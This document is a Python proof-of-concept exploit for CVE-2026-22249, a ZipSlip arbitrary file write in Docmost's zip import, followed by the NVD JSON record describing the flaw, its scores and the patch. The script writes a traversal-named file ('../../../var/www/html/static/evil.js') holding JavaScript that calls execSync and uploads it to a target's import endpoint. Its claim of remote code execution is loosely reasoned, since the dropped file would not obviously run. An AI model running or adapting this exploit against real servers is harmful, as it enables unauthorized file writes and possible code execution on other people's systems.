CVE-2026-22249

import zipfile import os import sys import requests # PoC for CVE-2026-22249: Docmost ZipSlip Arbitrary File Write # This script demonstrates how an attacker can exploit the ZipSlip vulnerability def create_malicious_zip(target_path, output_file): """ Create a malicious ZIP file containing a file with path traversal in its name """ with zipfile.ZipFile(output_file, 'w') as zf: # Create a file with path traversal sequence to write outside target directory # Adjust the number of ../ based on the actual directory structure malicious_filename = '../../../var/www/html/static/evil.js' malicious_content = b'// Malicious JavaScript - Remote Code Execution\n' malicious_content += b'const { execSync } = require("child_process");\n' malicious_content += b'execSync(process.argv[1]);\n' # Add the malicious file to the ZIP archive zf.writestr(malicious_filename, malicious_content) print(f'[+] Created malicious file: {malicious_filename}') print(f'[+] Output ZIP: {output_file}') def main(): if len(sys.argv) < 3: print('Usage: python cve-2026-22249-poc.py <target_url> <output_zip>') print('Example: python cve-2026-22249-poc.py http://docmost.local:3000 malicious.zip') sys.exit(1) target_url = sys.argv[1] output_file = sys.argv[2] # Create the malicious ZIP file create_malicious_zip('/api/import/upload', output_file) # Upload the malicious ZIP file upload_url = f'{target_url}/api/import/upload' print(f'\n[!] Upload the {output_file} file through the Docmost import feature') print(f'[!] The file will be extracted and written to an arbitrary location') print(f'[!] Target path: ../../../var/www/html/static/evil.js') # Attempt to upload try: with open(output_file, 'rb') as f: files = {'file': (output_file, f, 'application/zip')} response = requests.post(upload_url, files=files, timeout=30) print(f'\n[+] Response Status: {response.status_code}') print(f'[+] Response: {response.text}') except requests.exceptions.RequestException as e: print(f'[-] Error uploading file: {e}') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2026-22249", "sourceIdentifier": "[email protected]", "published": "2026-01-15T19:16:05.527", "lastModified": "2026-01-22T15:44:51.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Docmost is an open-source collaborative wiki and documentation software. From 0.21.0 to before 0.24.0, Docmost is vulnerable to Arbitrary File Write via Zip Import Feature (ZipSlip). In apps/server/src/integrations/import/utils/file.utils.ts, there are no validation on filename. This vulnerability is fixed in 0.24.0."}, {"lang": "es", "value": "Docmost es un software de wiki colaborativo y documentación de código abierto. Desde la 0.21.0 hasta antes de la 0.24.0, Docmost es vulnerable a la escritura arbitraria de archivos a través de la función de importación de Zip (ZipSlip). En apps/servidor/src/integrations/import/utils/file.utils.ts, no hay validación en el nombre de archivo. Esta vulnerabilidad está corregida en la 0.24.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:docmost:docmost:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.21.0", "versionEndExcluding": "0.24.0", "matchCriteriaId": "6B3C6E1E-C674-45AA-A3B0-6518B205D8B5"}]}]}], "references": [{"url": "https://github.com/docmost/docmost/commit/c3b350d943108552e20654580005cd6f6c78ab05", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/docmost/docmost/pull/1753", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/docmost/docmost/releases/tag/v0.24.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/docmost/docmost/security/advisories/GHSA-54pm-hqxm-54wg", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/docmost/docmost/security/advisories/GHSA-54pm-hqxm-54wg", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}